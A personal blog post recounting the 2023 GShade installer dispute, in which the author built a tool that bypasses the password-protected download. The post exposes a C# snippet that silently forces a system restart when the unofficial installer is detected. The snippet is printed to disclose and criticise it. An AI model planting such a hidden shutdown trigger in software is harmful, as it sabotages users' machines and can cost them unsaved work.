The GShade tango continues

Don't stop me nowwwwwwww

posted 2023-02-07

Warning

This post was made a long time ago. The information inside of it may be outdated, and the writing may not accurately reflect my current self.

If you haven’t read the first one, do that.

Enter DeezShade

After the password protected .zip file, I had the idea of using the installer itself to download the files.

I made DeezShade - it reflects the official installer with C# magic to download the files without the password. Pretty funny loophole.

Marot gets mad - the sequel

So, I woke up the next morning, and guess what?

Yes, this is the kind of bullshit that GShade is working on, rather than bothering to implement a more sensible update system. The installer RESTARTS YOUR SYSTEM if it detects it's not being run "properly". Continued... pic.twitter.com/3eacb6RH5U
— perchbird (@perchbird_) February 6, 2023

I, uh, yep - Marot put malware in the GShade installer.

Specifically, it detects if App._instReady is set to false (which it would be on the official installer and not on DeezShade), and if so, SHUTS DOWN YOUR COMPUTER. The code looks like this:

private static void lol() => new Process()
{
  StartInfo = {
    WorkingDirectory = Environment.SystemDirectory,
    FileName = "shutdown.exe",
    Arguments = "-r -t 0",
    WindowStyle = ProcessWindowStyle.Hidden
  }
}.Start();

// later on in the code...
public static void InitialPermissionsProcess()
{
  if (!App._instReady)
    App.lol();

  // other stuff here, omitted for reading pleasure
}

I think(?) this is against the Computer Fraud and Abuse Act, but I’m not a lawyer. Lawyers, tell me: idkthelaw@(this domain)

The ultimate confrontation

After patching it out in DeezShade by setting that variable + using Harmony to patch the shutdown code, I decided to confront Marot about it in the GPOSERS Discord server.

After being called a kindergartener by the person who accused me of conspiracy to commit a crime, Marot showed up and left me the ultimate message:

Marot's message

…Wow.

He… he put malware in his software… as a “lesson”. HE WROTE MALWARE TO GET BACK AT A 16 YEAR OLD. LMAO.

The fallout

After this, multiple events happened:

The community ditched GShade
Marot gets banned from the r/FFXIV Discord server
Crosire, the developer of ReShade, does not approve of Marot’s behavior
Several YouTube videos were made about me (one, two)
This makes it onto the news
Marot gets banned off of GitHub
- To be clear, I didn’t do this. This’ll probably end up scaring Marot away from FOSS more, but whatever.
GShade trends on Twitter
- This bled through into the Sims and Second Life community, which is really funny to me.

Whew, what a ride.

Support the future of FOSS

If you enjoyed this ride, you should consider supporting FOSS. Support individual developers or donate to a larger charity fighting for technological freedom. Consider donating to the Software Freedom Conservancy, the Electronic Frontier Foundation, or any of your choice. I’d really appreciate it.

Now, back to my homework, eh? :^